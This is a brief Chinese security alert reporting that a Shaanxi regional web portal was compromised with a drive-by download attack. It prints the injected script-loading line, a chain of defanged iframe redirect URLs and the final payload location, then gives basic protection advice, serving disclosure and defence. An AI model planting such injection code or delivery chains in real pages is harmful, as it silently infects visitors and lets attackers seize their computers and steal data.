注册
登录
| 关键词: hxxp iframe cn htm 40 恶意 病毒 vnet zz 77 |
陕西互联星空(hxxp://sn.vnet.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:hxxp://img.sn.vnet.cn/vnetcms2_files/pages/date.js 网页被嵌入恶意链接代码: document.writeln(”<script language=javascript src=hxxp:\/\/myut.kmip.net\/cs.js><\/script>”) 挂马分析: [wide]hxxp://v.sn.vnet.cn/index/news.jsp?contentId=1892721 [script]hxxp://img.sn.vnet.cn/vnetcms2_files/pages/date.js [script]hxxp://myut.kmip.net/cs.js [iframe]hxxp://cnksq.cn/jj/8.htm [iframe]hxxp://zz77z.cn/x40/xx.html [iframe]hxxp://zz77z.cn/x40/td14.htm [iframe]hxxp://zz77z.cn/x40/yt.htm [iframe]hxxp://zz77z.cn/x40/dxxz.htm [iframe]hxxp://zz77z.cn/x40/yut.htm [iframe]hxxp://zz77z.cn/x40/ytfl.htm [iframe]hxxp://zz77z.cn/x40/ytfl1.htm [iframe]hxxp://zz77z.cn/x40/of.htm 最终下载病毒文件: hxxp://d.ksxwa.com/xx/x40.css 通过执行以上病毒文件,来达到完全控制访问者的系统。 该网站历史挂马次数:1 Google对该网站的判定:安全 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 黑基论坛邀请码:8ba5318aa8AKa2N6 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
